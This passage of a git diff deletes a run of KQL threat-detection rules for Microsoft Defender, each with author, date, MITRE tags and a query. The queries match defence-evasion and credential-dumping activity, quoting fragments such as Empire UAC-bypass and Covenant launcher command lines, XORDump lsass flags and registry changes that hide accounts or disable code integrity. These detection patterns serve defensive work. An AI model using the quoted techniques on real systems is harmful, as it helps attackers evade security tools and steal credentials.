-// Date: 2022/08/05
-// Level: high
-// Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where ActionType =~ "DeleteValue" and RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders"
\ No newline at end of file
diff --git a/Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql b/Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql
deleted file mode 100644
index 90889ca1..00000000
--- a/Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
-// Date: 2024/01/05
-// Level: high
-// Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (ProcessCommandLine startswith "/c echo \"" and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine endswith ".exe" or InitiatingProcessCommandLine endswith ".exe\"")) and (not(((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") and InitiatingProcessFolderPath endswith "\\forfiles.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Fsutil_Suspicious_Invocation.kql b/Defense Evasion/Fsutil_Suspicious_Invocation.kql
deleted file mode 100644
index a4ffc9ee..00000000
--- a/Defense Evasion/Fsutil_Suspicious_Invocation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Ecco, E.M. Anhaus, oscd.community
-// Date: 2019/09/26
-// Level: high
-// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).
-Might be used by ransomwares during the attack (seen by NotPetya and others).
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1485
-DeviceProcessEvents
-| where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Gpscript_Execution.kql b/Defense Evasion/Gpscript_Execution.kql
deleted file mode 100644
index c9be70bc..00000000
--- a/Defense Evasion/Gpscript_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/16
-// Level: medium
-// Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /logon" or ProcessCommandLine contains " /startup") and (FolderPath endswith "\\gpscript.exe" or ProcessVersionInfoOriginalFileName =~ "GPSCRIPT.EXE")) and (not(InitiatingProcessCommandLine =~ "C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc"))
\ No newline at end of file
diff --git a/Defense Evasion/Greedy_File_Deletion_Using_Del.kql b/Defense Evasion/Greedy_File_Deletion_Using_Del.kql
deleted file mode 100644
index f7cc425a..00000000
--- a/Defense Evasion/Greedy_File_Deletion_Using_Del.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113 , X__Junior (Nextron Systems)
-// Date: 2021/12/02
-// Level: medium
-// Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains "\\*.au3" or ProcessCommandLine contains "\\*.dll" or ProcessCommandLine contains "\\*.exe" or ProcessCommandLine contains "\\*.js") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Defense Evasion/HH.EXE_Execution.kql b/Defense Evasion/HH.EXE_Execution.kql
deleted file mode 100644
index 2152b61e..00000000
--- a/Defense Evasion/HH.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community
-// Date: 2019/10/24
-// Level: low
-// Description: Detects the execution of "hh.exe" to open ".chm" files.
-// Tags: attack.defense_evasion, attack.t1218.001
-DeviceProcessEvents
-| where ProcessCommandLine contains ".chm" and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql b/Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
deleted file mode 100644
index 25771e32..00000000
--- a/Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql b/Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql
deleted file mode 100644
index 10ec08bc..00000000
--- a/Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2020/06/04
-// Level: high
-// Description: Detects suspicious command lines used in Covenant luanchers
-// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1564.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql b/Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql
deleted file mode 100644
index bc2833d5..00000000
--- a/Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2020/05/22
-// Level: high
-// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql b/Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql
deleted file mode 100644
index 1570339a..00000000
--- a/Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/07
-// Level: critical
-// Description: Detects the use of the Dinject PowerShell cradle based on the specific flags
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
-| where ProcessCommandLine contains " /am51" and ProcessCommandLine contains " /password"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_EDRSilencer_Execution.kql b/Defense Evasion/HackTool_-_EDRSilencer_Execution.kql
deleted file mode 100644
index 2186bbd5..00000000
--- a/Defense Evasion/HackTool_-_EDRSilencer_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: @gott_cyber
-// Date: 2024/01/02
-// Level: high
-// Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.
-
-// Tags: attack.defense_evasion, attack.t1562
-DeviceProcessEvents
-| where FolderPath endswith "\\EDRSilencer.exe" or ProcessVersionInfoOriginalFileName =~ "EDRSilencer.exe" or ProcessVersionInfoFileDescription contains "EDRSilencer"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql b/Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql
deleted file mode 100644
index a4dbd554..00000000
--- a/Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco
-// Date: 2019/08/30
-// Level: critical
-// Description: Detects some Empire PowerShell UAC bypass methods
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql b/Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql
deleted file mode 100644
index fc12c1e8..00000000
--- a/Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alfie Champion (ajpc500)
-// Date: 2021/06/02
-// Level: critical
-// Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains "StartNodeRelay"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql b/Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql
deleted file mode 100644
index 7fbc35fb..00000000
--- a/Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/05
-// Level: high
-// Description: Detects the execution GMER tool based on image and hash fields.
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath endswith "\\gmer.exe" or (MD5 =~ "e9dc058440d321aa17d0600b3ca0ab04" or SHA1 =~ "539c228b6b332f5aa523e5ce358c16647d8bbe57" or SHA256 =~ "e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173") or (MD5 startswith "E9DC058440D321AA17D0600B3CA0AB04" or SHA1 startswith "539C228B6B332F5AA523E5CE358C16647D8BBE57" or SHA256 startswith "E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_PowerTool_Execution.kql b/Defense Evasion/HackTool_-_PowerTool_Execution.kql
deleted file mode 100644
index c9ca0ad1..00000000
--- a/Defense Evasion/HackTool_-_PowerTool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/29
-// Level: high
-// Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\PowerTool.exe" or FolderPath endswith "\\PowerTool64.exe") or ProcessVersionInfoOriginalFileName =~ "PowerTool.exe"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql b/Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql
deleted file mode 100644
index 90d50234..00000000
--- a/Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander Rausch
-// Date: 2020/06/24
-// Level: high
-// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
-// Tags: attack.execution, attack.defense_evasion, attack.t1106, attack.t1059.003, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql b/Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql
deleted file mode 100644
index 76d6ce50..00000000
--- a/Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/09/07
-// Level: high
-// Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceProcessEvents
-| where FolderPath endswith "\\SharpEvtMute.exe" or ProcessVersionInfoFileDescription =~ "SharpEvtMute" or (ProcessCommandLine contains "--Filter \"rule " or ProcessCommandLine contains "--Encoded --Filter \\\"")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql b/Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql
deleted file mode 100644
index 38bdaaa1..00000000
--- a/Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/27
-// Level: high
-// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1134.001, attack.t1134.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_Stracciatella_Execution.kql b/Defense Evasion/HackTool_-_Stracciatella_Execution.kql
deleted file mode 100644
index fbafb340..00000000
--- a/Defense Evasion/HackTool_-_Stracciatella_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
-// Tags: attack.execution, attack.defense_evasion, attack.t1059, attack.t1562.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a") or (SHA256 in~ ("9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956", "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a"))
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_WinPwn_Execution.kql b/Defense Evasion/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Defense Evasion/HackTool_-_WinPwn_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql b/Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql
deleted file mode 100644
index 68ddb59a..00000000
--- a/Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/08
-// Level: high
-// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
-// Tags: attack.defense_evasion, attack.lateral_movement
-DeviceProcessEvents
-| where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_XORDump_Execution.kql b/Defense Evasion/HackTool_-_XORDump_Execution.kql
deleted file mode 100644
index e4c4bc39..00000000
--- a/Defense Evasion/HackTool_-_XORDump_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/28
-// Level: high
-// Description: Detects suspicious use of XORDump process memory dumping utility
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\xordump.exe" or (ProcessCommandLine contains " -process lsass.exe " or ProcessCommandLine contains " -m comsvcs " or ProcessCommandLine contains " -m dbghelp " or ProcessCommandLine contains " -m dbgcore ")
\ No newline at end of file
diff --git a/Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql b/Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql
deleted file mode 100644
index 95c4232d..00000000
--- a/Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/26
-// Level: high
-// Description: Detects when the "index" value of a scheduled task is modified from the registry
-Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
-
-// Tags: attack.defense_evasion, attack.t1562
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree" and RegistryKey contains "Index")
\ No newline at end of file
diff --git a/Defense Evasion/Hiding_Files_with_Attrib.exe.kql b/Defense Evasion/Hiding_Files_with_Attrib.exe.kql
deleted file mode 100644
index e50cf89e..00000000
--- a/Defense Evasion/Hiding_Files_with_Attrib.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sami Ruohonen
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects usage of attrib.exe to hide files from users.
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " +h " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")) and (not(ProcessCommandLine contains "\\desktop.ini ")) and (not((ProcessCommandLine =~ "+R +H +S +A \\*.cui" and InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat" and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql b/Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql
deleted file mode 100644
index 35550a8f..00000000
--- a/Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2022/07/12
-// Level: high
-// Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
-// Tags: attack.defense_evasion, attack.t1564.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and ActionType =~ "RegistryValueSet" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"
\ No newline at end of file
diff --git a/Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql b/Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql
deleted file mode 100644
index c02daff0..00000000
--- a/Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
-// Date: 2023/03/14
-// Level: high
-// Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and ActionType =~ "RegistryValueSet" and (RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled")
\ No newline at end of file
diff --git a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql b/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql
deleted file mode 100644
index 8d85ed8d..00000000
--- a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)
-// Date: 2023/09/05
-// Level: high
-// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
-
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryValueData contains "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and (RegistryKey endswith "\\http" or RegistryKey endswith "\\https")
\ No newline at end of file
diff --git a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql b/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql
deleted file mode 100644
index 914b3568..00000000
--- a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/05
-// Level: high
-// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
-
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql b/Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql
deleted file mode 100644
index eb074d5f..00000000
--- a/Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/16
-// Level: medium
-// Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where FolderPath contains "\\inetpub\\logs\\LogFiles\\" and FolderPath endswith ".log"
\ No newline at end of file
diff --git a/Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql b/Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql
deleted file mode 100644
index bb522faa..00000000
--- a/Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/09/02
-// Level: medium
-// Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
-
-// Tags: attack.command_and_control, attack.defense_evasion, attack.t1218, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i" and ProcessCommandLine contains "-f") and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Imports_Registry_Key_From_a_File.kql b/Defense Evasion/Imports_Registry_Key_From_a_File.kql
deleted file mode 100644
index bc1d23a1..00000000
--- a/Defense Evasion/Imports_Registry_Key_From_a_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020/10/07
-// Level: medium
-// Description: Detects the import of the specified file to the registry with regedit.exe.
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /i " or ProcessCommandLine contains " /s " or ProcessCommandLine contains ".reg") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ") and ProcessCommandLine matches regex ":[^ \\\\]")))
\ No newline at end of file
diff --git a/Defense Evasion/Imports_Registry_Key_From_an_ADS.kql b/Defense Evasion/Imports_Registry_Key_From_an_ADS.kql
deleted file mode 100644
index 7ba7ccb4..00000000
--- a/Defense Evasion/Imports_Registry_Key_From_an_ADS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects the import of a alternate datastream to the registry with regedit.exe.
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " /i " or ProcessCommandLine contains ".reg") and ProcessCommandLine matches regex ":[^ \\\\]") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ")))
\ No newline at end of file
diff --git a/Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql b/Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql
deleted file mode 100644
index 786d5065..00000000
--- a/Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: A. Sungurov , oscd.community
-// Date: 2020/10/12
-// Level: low
-// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
